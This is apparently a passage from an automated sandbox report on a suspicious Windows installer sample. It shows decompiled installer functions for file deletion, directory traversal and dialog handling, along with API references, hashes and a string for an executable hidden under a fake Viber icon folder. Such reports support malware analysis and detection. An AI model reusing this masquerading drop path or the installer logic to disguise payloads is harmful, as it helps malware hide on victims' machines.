                                                                                                          • Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wogZe27GBB.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wogZe27GBB.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                          • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\wogZe27GBB.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
                                                                                                        • SetDlgItemTextA.USER32 ref: 0040462A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CharItemText$Next$A680BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe"$A$C:\Users\user\AppData\Roaming\ViberPC\Icons
                                                                                                        • API String ID: 1371326663-1892149227
                                                                                                        • Opcode ID: 8a3aad76447270b687e8e1509915f8df1e24d5d4c23db986a95c4726ded8d1ea
                                                                                                        • Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
                                                                                                        • Opcode Fuzzy Hash: 8a3aad76447270b687e8e1509915f8df1e24d5d4c23db986a95c4726ded8d1ea
                                                                                                        • Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				void* _t38;
				char* _t46;
				signed int _t49;
				signed int _t52;
				signed int _t58;
				signed int _t59;
				void* _t61;
				signed int _t64;
				void* _t66;
				CHAR* _t68;
				char* _t71;

				_t68 = _a4;
				_t37 = E0040573A(__eflags, _t68);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t59 = DeleteFileA(_t68);
					asm("sbb eax, eax");
					_t61 =  ~_t59 + 1;
					 *0x423f28 =  *0x423f28 + _t61;
					return _t61;
				}
				_t64 = _a8 & 0x00000001;
				__eflags = _t64;
				_v8 = _t64;
				if(_t64 == 0) {
					L5:
					_t38 = E00405B66(0x4214a8, _t68);
					__eflags = _t64;
					if(_t64 == 0) {
						_t38 = E004056A0(_t38, _t68);
					} else {
						_push("\*.*");
						_push(0x4214a8);
						L00405B82();
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						_push(0x409010);
						_push(_t68);
						L00405B82();
						L11:
						_push(_t68);
						L00405B7C();
						_t66 = _t38 + _t68;
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t66 - 1;
								 *_t31 =  *(_t66 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t71 =  &(_v332.cFileName);
							_t46 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t46;
							if( *_t46 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t71 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t71 - 0x2e;
							if( *_t71 != 0x2e) {
								L19:
								E00405B66(_t66, _t71);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t68);
									_t49 = DeleteFileA(_t68);
									__eflags = _t49;
									if(_t49 != 0) {
										E00404F04(0xfffffff2, _t68);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t68);
											_push(0);
											_push(_t68);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t66, __eflags, _t68, _a8);
									}
								}
								goto L27;
							}
							_t58 =  *((intOrPtr*)(_t71 + 1));
							__eflags = _t58;
							if(_t58 == 0) {
								goto L27;
							}
							__eflags = _t58 - 0x2e;
							if(_t58 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t71 + 2));
							if( *((char*)(_t71 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t52 = FindNextFileA(_a4,  &_v332);
							__eflags = _t52;
						} while (_t52 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E61(_t68);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t37, _t68);
							E0040581E(_t68);
							_t37 = RemoveDirectoryA(_t68);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t68);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t68);
							_push(0);
							_push(_t68);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}


















                                                                                                        0x00405496
                                                                                                        0x0040549a
                                                                                                        0x004054a3
                                                                                                        0x004054a6
                                                                                                        0x004054a9
                                                                                                        0x004054b1
                                                                                                        0x004054b3
                                                                                                        0x004054b4
                                                                                                        0x00000000
                                                                                                        0x004054b4
                                                                                                        0x004054c3
                                                                                                        0x004054c3
                                                                                                        0x004054c6
                                                                                                        0x004054c9
                                                                                                        0x004054dd
                                                                                                        0x004054e4
                                                                                                        0x004054e9
                                                                                                        0x004054eb
                                                                                                        0x004054fb
                                                                                                        0x004054ed
                                                                                                        0x004054ed
                                                                                                        0x004054f2
                                                                                                        0x004054f3
                                                                                                        0x004054f3
                                                                                                        0x00405500
                                                                                                        0x00405503
                                                                                                        0x0040550e
                                                                                                        0x0040550e
                                                                                                        0x00405513
                                                                                                        0x00405514
                                                                                                        0x00405519
                                                                                                        0x00405519
                                                                                                        0x0040551a
                                                                                                        0x00405529
                                                                                                        0x0040552b
                                                                                                        0x00405531
                                                                                                        0x00405534
                                                                                                        0x00405537
                                                                                                        0x004055f4
                                                                                                        0x004055f4
                                                                                                        0x004055f8
                                                                                                        0x004055fa
                                                                                                        0x004055fa
                                                                                                        0x004055fa
                                                                                                        0x004055fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040553d
                                                                                                        0x0040553d
                                                                                                        0x00405546
                                                                                                        0x0040554c
                                                                                                        0x00405551
                                                                                                        0x00405554
                                                                                                        0x00405556
                                                                                                        0x0040555a
                                                                                                        0x0040555c
                                                                                                        0x0040555c
                                                                                                        0x0040555a
                                                                                                        0x0040555f
                                                                                                        0x00405562
                                                                                                        0x00405575
                                                                                                        0x00405577
                                                                                                        0x0040557c
                                                                                                        0x00405583
                                                                                                        0x0040559b
                                                                                                        0x004055a1
                                                                                                        0x004055a7
                                                                                                        0x004055a9
                                                                                                        0x004055ce
                                                                                                        0x004055ab
                                                                                                        0x004055ab
                                                                                                        0x004055af
                                                                                                        0x004055c3
                                                                                                        0x004055b1
                                                                                                        0x004055b4
                                                                                                        0x004055b9
                                                                                                        0x004055bb
                                                                                                        0x004055bc
                                                                                                        0x004055bc
                                                                                                        0x004055af
                                                                                                        0x00405585
                                                                                                        0x0040558b
                                                                                                        0x0040558d
                                                                                                        0x00405593
                                                                                                        0x00405593
                                                                                                        0x0040558d
                                                                                                        0x00000000
                                                                                                        0x00405583
                                                                                                        0x00405564
                                                                                                        0x00405567
                                                                                                        0x00405569
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040556b
                                                                                                        0x0040556d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040556f
                                                                                                        0x00405573
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004055d3
                                                                                                        0x004055dd
                                                                                                        0x004055e3
                                                                                                        0x004055e3
                                                                                                        0x004055ee
                                                                                                        0x00000000
                                                                                                        0x004055ee
                                                                                                        0x00405505
                                                                                                        0x0040550c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004054cb
                                                                                                        0x004054cb
                                                                                                        0x004054cd
                                                                                                        0x004055fe
                                                                                                        0x00405601
                                                                                                        0x00405604
                                                                                                        0x00405656
                                                                                                        0x00405656
                                                                                                        0x00405656
                                                                                                        0x00405606
                                                                                                        0x00405609
                                                                                                        0x00405614
                                                                                                        0x00405619
                                                                                                        0x0040561b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040561e
                                                                                                        0x00405624
                                                                                                        0x0040562a
                                                                                                        0x00405630
                                                                                                        0x00405632
                                                                                                        0x00000000
                                                                                                        0x0040564e
                                                                                                        0x00405634
                                                                                                        0x00405638
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040563d
                                                                                                        0x00405642
                                                                                                        0x00405643
                                                                                                        0x00000000
                                                                                                        0x00405644
                                                                                                        0x0040560b
                                                                                                        0x0040560b
                                                                                                        0x00000000
                                                                                                        0x0040560b
                                                                                                        0x004054d3
                                                                                                        0x004054d7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004054d7

                                                                                                        APIs
                                                                                                        • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\wogZe27GBB.exe" ,74B5F560), ref: 004054A9
                                                                                                        • lstrcat.KERNEL32(004214A8,\*.*), ref: 004054F3
                                                                                                        • lstrcat.KERNEL32(?,00409010), ref: 00405514
                                                                                                        • lstrlen.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\wogZe27GBB.exe" ,74B5F560), ref: 0040551A
                                                                                                        • FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\wogZe27GBB.exe" ,74B5F560), ref: 0040552B
                                                                                                        • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
                                                                                                        • FindClose.KERNEL32(?), ref: 004055EE
                                                                                                        Strings
                                                                                                        • \*.*, xrefs: 004054ED
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                                        • "C:\Users\user\Desktop\wogZe27GBB.exe" , xrefs: 00405495
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                        • String ID: "C:\Users\user\Desktop\wogZe27GBB.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                        • API String ID: 2035342205-3830502297
                                                                                                        • Opcode ID: 7a19b7ea85d0f8bff8962d5b7d174e9fed4053393f49275f79294cdc09bf412a
                                                                                                        • Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
                                                                                                        • Opcode Fuzzy Hash: 7a19b7ea85d0f8bff8962d5b7d174e9fed4053393f49275f79294cdc09bf412a
                                                                                                        • Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0);
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}




                                                                                                        0x00405e6c
                                                                                                        0x00405e75
                                                                                                        0x00000000
                                                                                                        0x00405e82
                                                                                                        0x00405e78
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,74B5F560,0040549F,?,"C:\Users\user\Desktop\wogZe27GBB.exe" ,74B5F560), ref: 00405E6C
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405E78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 2295610775-0
                                                                                                        • Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                        • Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
                                                                                                        • Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                        • Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 39%
                                                                                                        			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                        0x00402656
                                                                                                        0x0040266a
                                                                                                        0x00402675
                                                                                                        0x00402676
                                                                                                        0x004027b1
                                                                                                        0x00402658
                                                                                                        0x00402658
                                                                                                        0x0040265a
                                                                                                        0x0040265c
                                                                                                        0x0040265c
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 1974802433-0
                                                                                                        • Opcode ID: 92ffb88694b69cf505f42f79ebf7d5c57c45f89139eb01951941d1b42e5af323
                                                                                                        • Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
                                                                                                        • Opcode Fuzzy Hash: 92ffb88694b69cf505f42f79ebf7d5c57c45f89139eb01951941d1b42e5af323
                                                                                                        • Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403A45, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E00403A45(struct HWND__* _a4, struct HWND__* _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v92;
				void* _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				void* _t62;
				signed int _t66;
				struct HWND__* _t72;
				signed int _t85;
				struct HWND__* _t90;
				signed int _t98;
				int _t102;
				signed int _t114;
				signed int _t115;
				int _t116;
				signed int _t121;
				struct HWND__* _t124;
				struct HWND__* _t125;
				int _t126;
				long _t129;
				int _t131;
				int _t132;
				void* _t133;

				_t114 = _a8;
				if(_t114 == 0x110 || _t114 == 0x408) {
					_t35 = _a12;
					_t124 = _a4;
					__eflags = _t114 - 0x110;
					 *0x420484 = _t35;
					if(_t114 == 0x110) {
						 *0x423ea8 = _t124;
						 *0x420498 = GetDlgItem(_t124, 1);
						_t90 = GetDlgItem(_t124, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t90;
						E00403F18(_t124);
						SetClassLongA(_t124, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t121 =  *0x4091c4; // 0xffffffff
					_t132 = 0;
					_t129 = (_t121 << 6) +  *0x423ec0;
					__eflags = _t121;
					if(_t121 < 0) {
						L34:
						E00403F64(0x40b);
						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t129 = _t129 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t132;
							if( *0x42366c != _t132) {
								break;
							}
							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t115 =  *(_t129 + 0x14);
							E00405B88(_t115, _t124, _t129, 0x42b800,  *((intOrPtr*)(_t129 + 0x24)));
							_push( *((intOrPtr*)(_t129 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t124);
							_push( *((intOrPtr*)(_t129 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t124);
							_push( *((intOrPtr*)(_t129 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t124);
							_t49 = GetDlgItem(_t124, 3);
							__eflags =  *0x423f2c - _t132;
							_v32 = _t49;
							if( *0x423f2c != _t132) {
								_t115 = _t115 & 0x0000fefd | 0x00000004;
								__eflags = _t115;
							}
							ShowWindow(_t49, _t115 & 0x00000008);
							EnableWindow( *(_t133 + 0x30), _t115 & 0x00000100);
							E00403F3A(_t115 & 0x00000002);
							_t116 = _t115 & 0x00000004;
							EnableWindow( *0x41f460, _t116);
							__eflags = _t116 - _t132;
							if(_t116 == _t132) {
								_push(1);
							} else {
								_push(_t132);
							}
							EnableMenuItem(GetSystemMenu(_t124, _t132), 0xf060, ??);
							SendMessageA( *(_t133 + 0x38), 0xf4, _t132, 1);
							__eflags =  *0x423f2c - _t132;
							if( *0x423f2c == _t132) {
								_push( *0x420498);
							} else {
								SendMessageA(_t124, 0x401, 2, _t132);
								_push( *0x41f460);
							}
							E00403F4D();
							_t62 = E00405B66(0x4204a0, 0x4236a0);
							_push( *((intOrPtr*)(_t129 + 0x18)));
							L00405B7C();
							E00405B88(0x4204a0, _t124, _t129, _t62 + 0x4204a0, 0x4204a0);
							SetWindowTextA(_t124, 0x4204a0);
							_push(_t132);
							_t66 = E00401389( *((intOrPtr*)(_t129 + 8)));
							__eflags = _t66;
							if(_t66 != 0) {
								continue;
							} else {
								__eflags =  *_t129 - _t132;
								if( *_t129 == _t132) {
									continue;
								}
								__eflags =  *(_t129 + 4) - 5;
								if( *(_t129 + 4) != 5) {
									 *0x4071e8( *0x423678);
									 *0x41fc70 = _t129;
									__eflags =  *_t129 - _t132;
									if( *_t129 <= _t132) {
										goto L58;
									}
									_t72 = CreateDialogParamA( *0x423ea0,  *_t129 +  *0x423680 & 0x0000ffff, _t124,  *(0x4091c8 +  *(_t129 + 4) * 4), _t129);
									__eflags = _t72 - _t132;
									 *0x423678 = _t72;
									if(_t72 == _t132) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t129 + 0x2c)));
									_push(6);
									E00403F18(_t72);
									GetWindowRect(GetDlgItem(_t124, 0x3fa), _t133 + 0x10);
									ScreenToClient(_t124, _t133 + 0x10);
									SetWindowPos( *0x423678, _t132,  *(_t133 + 0x20),  *(_t133 + 0x20), _t132, _t132, 0x15);
									_push(_t132);
									E00401389( *((intOrPtr*)(_t129 + 0xc)));
									__eflags =  *0x42366c - _t132;
									if( *0x42366c != _t132) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t132;
								if( *0x423f2c != _t132) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t132;
								if( *0x423f20 != _t132) {
									continue;
								}
								goto L61;
							}
						}
						 *0x4071e8( *0x423678);
						 *0x423ea8 = _t132;
						EndDialog(_t124,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t129 - _t132;
							if( *_t129 == _t132) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t85 = E00401389( *((intOrPtr*)(_t129 + 0x10)));
						__eflags = _t85;
						if(_t85 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t124 = _a4;
					_t132 = 0;
					if(_t114 == 0x47) {
						SetWindowPos( *0x420478, _t124, 0, 0, 0, 0, 0x13);
					}
					if(_t114 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t114);
					}
					if(_t114 != 0x40d) {
						__eflags = _t114 - 0x11;
						if(_t114 != 0x11) {
							__eflags = _t114 - 0x111;
							if(_t114 != 0x111) {
								L26:
								return E00403F7F(_t114, _a12, _a16);
							}
							_t131 = _a12 & 0x0000ffff;
							_t125 = GetDlgItem(_t124, _t131);
							__eflags = _t125 - _t132;
							if(_t125 == _t132) {
								L13:
								__eflags = _t131 - 1;
								if(_t131 != 1) {
									__eflags = _t131 - 3;
									if(_t131 != 3) {
										_t126 = 2;
										__eflags = _t131 - _t126;
										if(_t131 != _t126) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t132;
										if( *0x423f2c == _t132) {
											_t98 = E0040140B(3);
											__eflags = _t98;
											if(_t98 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t126);
										 *0x41f868 = _t126;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t132; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t131);
								goto L22;
							}
							SendMessageA(_t125, 0xf3, _t132, _t132);
							_t102 = IsWindowEnabled(_t125);
							__eflags = _t102;
							if(_t102 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t124, _t132, _t132);
						return 1;
					} else {
						 *0x4071e8( *0x423678);
						 *0x423678 = _a8;
						L58:
						if( *0x4214a0 == _t132 &&  *0x423678 != _t132) {
							ShowWindow(_t124, 0xa);
							 *0x4214a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                                                                                        0x00403a4e
                                                                                                        0x00403a57
                                                                                                        0x00403b98
                                                                                                        0x00403b9c
                                                                                                        0x00403ba0
                                                                                                        0x00403ba2
                                                                                                        0x00403ba7
                                                                                                        0x00403bb2
                                                                                                        0x00403bbd
                                                                                                        0x00403bc2
                                                                                                        0x00403bc4
                                                                                                        0x00403bc6
                                                                                                        0x00403bc9
                                                                                                        0x00403bce
                                                                                                        0x00403bdc
                                                                                                        0x00403be9
                                                                                                        0x00403bf0
                                                                                                        0x00403bf0
                                                                                                        0x00403bf1
                                                                                                        0x00403bf1
                                                                                                        0x00403bf6
                                                                                                        0x00403bfc
                                                                                                        0x00403c03
                                                                                                        0x00403c09
                                                                                                        0x00403c0b
                                                                                                        0x00403c4b
                                                                                                        0x00403c50
                                                                                                        0x00403c55
                                                                                                        0x00403c55
                                                                                                        0x00403c5a
                                                                                                        0x00403c63
                                                                                                        0x00403c65
                                                                                                        0x00403c6a
                                                                                                        0x00403c70
                                                                                                        0x00403c74
                                                                                                        0x00403c74
                                                                                                        0x00403c79
                                                                                                        0x00403c7f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403c8a
                                                                                                        0x00403c90
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403c99
                                                                                                        0x00403ca1
                                                                                                        0x00403ca6
                                                                                                        0x00403ca9
                                                                                                        0x00403caf
                                                                                                        0x00403cb4
                                                                                                        0x00403cb7
                                                                                                        0x00403cbd
                                                                                                        0x00403cc2
                                                                                                        0x00403cc5
                                                                                                        0x00403ccb
                                                                                                        0x00403cd3
                                                                                                        0x00403cd9
                                                                                                        0x00403cdf
                                                                                                        0x00403ce3
                                                                                                        0x00403cea
                                                                                                        0x00403cea
                                                                                                        0x00403cea
                                                                                                        0x00403cf4
                                                                                                        0x00403d06
                                                                                                        0x00403d12
                                                                                                        0x00403d17
                                                                                                        0x00403d21
                                                                                                        0x00403d27
                                                                                                        0x00403d29
                                                                                                        0x00403d2e
                                                                                                        0x00403d2b
                                                                                                        0x00403d2b
                                                                                                        0x00403d2b
                                                                                                        0x00403d3e
                                                                                                        0x00403d56
                                                                                                        0x00403d58
                                                                                                        0x00403d5e
                                                                                                        0x00403d73
                                                                                                        0x00403d60
                                                                                                        0x00403d69
                                                                                                        0x00403d6b
                                                                                                        0x00403d6b
                                                                                                        0x00403d79
                                                                                                        0x00403d89
                                                                                                        0x00403d8e
                                                                                                        0x00403d92
                                                                                                        0x00403d9a
                                                                                                        0x00403da1
                                                                                                        0x00403da7
                                                                                                        0x00403dab
                                                                                                        0x00403db0
                                                                                                        0x00403db2
                                                                                                        0x00000000
                                                                                                        0x00403db8
                                                                                                        0x00403db8
                                                                                                        0x00403dba
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403dc0
                                                                                                        0x00403dc4
                                                                                                        0x00403de9
                                                                                                        0x00403def
                                                                                                        0x00403df5
